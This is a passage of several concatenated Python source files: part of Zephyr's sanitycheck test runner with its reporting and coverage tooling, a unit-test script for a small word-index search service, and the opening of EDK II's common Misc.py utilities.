discards[instance] = "Not enough RAM"
continue
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = "No hardware support"
continue
if plat.flash < tc.min_flash:
discards[instance] = "Not enough FLASH"
continue
if set(plat.ignore_tags) & tc.tags:
discards[instance] = "Excluded tags per platform"
continue
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_whitelist:
a = set(self.default_platforms)
b = set(tc.platform_whitelist)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = "Not a default test platform"
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception: %s' % (test, exc))
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
run = "Sanitycheck"
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
eleTestsuite = tree.findall('testsuite')[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
eleTestsuites = ET.Element('testsuites')
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (errors + passes + fails + skips),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in self.instances.items():
if platform and instance.platform.name != platform:
continue
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.name
# remove testcases that are being re-run from exiting reports
if append:
for tc in eleTestsuite.findall('testcase'):
if tc.get('classname') == "%s:%s" % (instance.platform.name, tname):
eleTestsuite.remove(tc)
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, tname),
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message=instance.reason)
else:
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, instance.testcase.name),
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Lcov()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
unit_tests.py
|
from __future__ import print_function
from database_api import DatabaseAPI
from index_service import IndexService, Indexer, Parser
import multiprocessing as mp
from twisted.web import server, resource
from twisted.internet import reactor
import requests
import json
import config
class DatabaseAPI_test:
'''
Test class for database_api.py. The functions _make_connection() and _close_connection()
are implicitly tested when the other functions are tested.
'''
def set_up(self):
self.index = DatabaseAPI(config.db_host, config.db_port,
config.db_name, config.db_user, config.db_pass)
self.passed_tests = 0
self.failed_tests = 0
# Making a table, inserting a few items, querying the database for said item.
# Explicitly tests make_table(), upsert() and query() togheter, in database_API.py.
# Implicitly tests _make_connection() and _close_connection() in database_API.py.
def test_routine1(self):
print("Test 1: ",end='')
self.index.make_tables('wordfreq', {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.upsert(table_name='wordfreq', article_id='test1', values=[('test_word1', 1), ('test_word2', 2)])
query_data = self.index.query("SELECT articleid, word, frequency FROM wordfreq WHERE word = 'test_word2';")
if query_data[0][0] == 'test1' and query_data[0][1] == 'test_word2' and query_data[0][2] == 2:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
# More or less the same as test_routine1(), but now also tests remove().
# Explicitly tests make_table(), upsert(), query() and remove() in database_API.py.
# Implicitly tests _make_connection() and _close_connection() in database_API.py.
def test_routine2(self):
print("Test 2: ", end='')
self.index.make_tables('wordfreq', {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.upsert(table_name='wordfreq', article_id='test2', values=[('test_word', 1)])
self.index.remove('wordfreq', 'articleid', 'test2')
query_data = self.index.query("SELECT articleid, word, frequency FROM wordfreq WHERE articleid = 'test2';")
if query_data == []:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
# Tests if upsert() updates values correctly.
def test_routine3(self):
print("Test 3: ", end='')
self.index.make_tables('wordfreq', {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.upsert(table_name='wordfreq', article_id='test3', values=[('test_word', 1)])
self.index.upsert(table_name='wordfreq', article_id='test3', values=[('test_word', 5)])
query_data = self.index.query("SELECT articleid, word, frequency FROM wordfreq WHERE articleid = 'test3';")
if query_data[0][2] == 5:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
def run_tests(self):
print('Testing DatabaseAPI:')
self.set_up()
self.test_routine1()
self.test_routine2()
self.test_routine3()
def print_results(self):
print("DatabaseAPI test results:")
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class Parser_test:
'''
Test class for the Parser class in index_service.py.
'''
def set_up(self):
self.passed_tests = 0
self.failed_tests = 0
self.html = '''
<!DOCTYPE html>
<html lang="en" style="font-family: Verdana">
<head>
<meta charset="UTF-8">
<title>
title
</title>
</head>
<body>
<p>
text
</p>
<div>
ignore
</div>
</body>
</html>
'''
self.parser = Parser(['div'])
# Tests if the Parser ingores the right tags.
def test1(self):
print('Test 1: ', end='')
self.set_up()
self.parser.feed(self.html)
content = set(self.parser.get_content())
self.parser.close()
if 'ignore' in content:
self.failed_tests += 1
print('failed')
elif 'title' in content and 'text' in content:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
print('failed')
def run_tests(self):
print("Testing Parser:")
self.test1()
def print_results(self):
print("Parser test results:")
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class Indexer_test:
'''
Test class for the Indexer class in index_service.py.
'''
def set_up(self):
self.passed_tests = 0
self.failed_tests = 0
self.indexer = Indexer(config.stopword_file_path, ['h1'])
# Tests if the Indexer makes the correct index for sample page.
def test1(self):
print('Test 1: ', end='')
url = 'http://folk.ntnu.no/alekh/it2805/index.html'
index = dict(self.indexer.make_index(url))
correct_result = {'it2805' : 1, 'prosjekt' : 1, 'to' : 11, 'link' : 11, 'homework' : 11}
for k, v in correct_result.items():
if index[k] != v:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
def run_tests(self):
print("Testing Indexer:")
self.set_up()
self.test1()
def print_results(self):
print("Indexer test results:")
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class IndexService_test:
'''
Test class for the IndexService class in index_service.py.
'''
def set_up(self):
self.passed_tests = 0
self.failed_tests = 0
self.index = IndexService()
reactor.listenTCP(8002, server.Site(PublishTestServer()))
self.test_publish_server_thread = mp.Process(target=reactor.run)
self.test_publish_server_thread.start()
self.test_index_service_thread = mp.Process(target=self.index.run_as_daemon, args=(8001, True))
self.test_index_service_thread.start()
#self.test_publish_server_thread.join()
#self.test_index_service_thread.join()
def init(self):
self.index.index_database.make_tables("wordfreq", {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
self.index.index_all_articles('http://127.0.0.1:8002', unit_test=True)
# Tests if if the IndexService indexes all articles from a given publish service. Implicitly tests index_articles() too.
def test1(self):
self.init()
query_data1 = dict(self.index.index_database.query("SELECT word, frequency FROM wordfreq WHERE articleid = 'test1';"))
correct_result1 = {'it2805' : 2, 'prosjekt' : 1, 'to' : 11, 'link' : 11, 'homework' : 11, 'web' : 1, 'course' : 1, 'asd' : None}
print("Test 1: ", end='')
for k, v in correct_result1.items():
if query_data1.get(k) != v:
self.failed_tests += 1
print('failed')
return
query_data2 = dict(self.index.index_database.query("SELECT word, frequency FROM wordfreq WHERE articleid = 'test2';"))
correct_result2 = {'it2805' : None, 'site' : 1, 'tabels' : 1, 'links' : 1, 'homework' : 1, 'assignment' : 1, 'course' : None}
for k, v in correct_result2.items():
if query_data2.get(k) != v:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
# Testing render_post() with task getSuggestions.
def test2(self):
self.init()
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'getSuggestions', 'word' : 'lin'}))
correct_result =set(['link', 'links'])
print("Test 2: ", end='')
for s in r.json()['suggestions']:
if s not in correct_result:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
# Testing render_post() with task getArticles.
def test3(self):
self.init()
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'getArticles', 'word' : 'coding'}))
print("Test 3: ", end='')
if r.json()['articleID'] == ['test2']:
self.passed_tests += 1
print('pass')
else:
self.failed_tests += 1
# Testing render_post() with task getFrequencyList.
def test4(self):
self.init()
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'getFrequencyList'}))
results = r.json()
correct_result = {'homework' : 12, 'course' : 1, 'link' : 11, 'links' : 1, 'it2805' : 2, 'to' : 11, 'html' : 1}
print('Test 4: ', end='')
for k, v in correct_result.items():
if results.get(k) != v:
self.failed_tests += 1
print('failed')
return
self.passed_tests += 1
print('pass')
'''
# Testing render_post() with task publishedArticle.
def test5(self):
self.index.index_database.make_tables("wordfreq", {"articleid" : "VARCHAR", "word" : "VARCHAR", "frequency" : "INTEGER"}, "(articleid, word)")
r = requests.post('http://127.0.0.1:8001', data = json.dumps({'task' : 'publishedArticle' 'articleID' : 'http://folk.ntnu.no/alekh/it2805/index.html'}))
# Testing render_post() with task removedArticle.
def test6(self):
self.init()
'''
def run_tests(self):
print("Testing IndexService:")
self.set_up()
self.test1()
self.test2()
self.test3()
self.test4()
# No need for further testing since the other functions are implicitly tested.
#self.test5()
#self.test6()
self.test_publish_server_thread.terminate()
self.test_index_service_thread.terminate()
def print_results(self):
print('IndexService test results:')
print("Passed", self.passed_tests, "out of", self.passed_tests + self.failed_tests, "tests.")
class PublishTestServer(resource.Resource):
'''
Publish test server for serving get requests from IndexService_test.
'''
isLeaf = True
def render_GET(self, request):
return json.dumps({"list": [{"id" : "http://folk.ntnu.no/alekh/it2805/index.html", "title" : "test1"}, {"id" : "http://folk.ntnu.no/alekh/it2805/02/index.html", "title" : "test2"}]})
if __name__ == "__main__":
database_test = DatabaseAPI_test()
database_test.run_tests()
print()
parser_test = Parser_test()
parser_test.run_tests()
print()
indexer_test = Indexer_test()
indexer_test.run_tests()
print()
index_service_test = IndexService_test()
index_service_test.run_tests()
from time import sleep
sleep(2)
print()
print("Results from tests:")
database_test.print_results()
parser_test.print_results()
indexer_test.print_results()
index_service_test.print_results()
'''
Results from tests:
DatabaseAPI test results:
Passed 3 out of 3 tests.
Parser test results:
Passed 1 out of 1 tests.
Indexer test results:
Passed 1 out of 1 tests.
IndexService test results:
Passed 4 out of 4 tests.
'''
|
Misc.py
|
## @file
# Common routines used by all tools
#
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
import sys
import string
import threading
import time
import re
import pickle
import array
import shutil
from random import sample
from struct import pack
import uuid
import subprocess
from collections import OrderedDict
import Common.LongFilePathOs as os
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from Common.DataType import *
from Common.BuildToolError import *
from CommonDataClass.DataClass import *
from Common.Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
from CommonDataClass.Exceptions import BadExpression
from Common.caching import cached_property
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## regular expressions for map file processing
startPatternGeneral = re.compile("^Start[' ']+Length[' ']+Name[' ']+Class")
addressPatternGeneral = re.compile("^Address[' ']+Publics by Value[' ']+Rva\+Base")
valuePatternGcc = re.compile('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$')
pcdPatternGcc = re.compile('^([\da-fA-Fx]+) +([\da-fA-Fx]+)')
secReGeneral = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
StructPattern = re.compile(r'[_a-zA-Z][0-9A-Za-z_]*$')
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
#
# If a module is built more than once with different PCDs or library classes
# a temporary INF file with same content is created, the temporary file is removed
# when build exits.
#
_TempInfs = []
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for line in lines:
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
# cannot pregenerate this RegEx since it uses varname from varnames.
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m is not None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
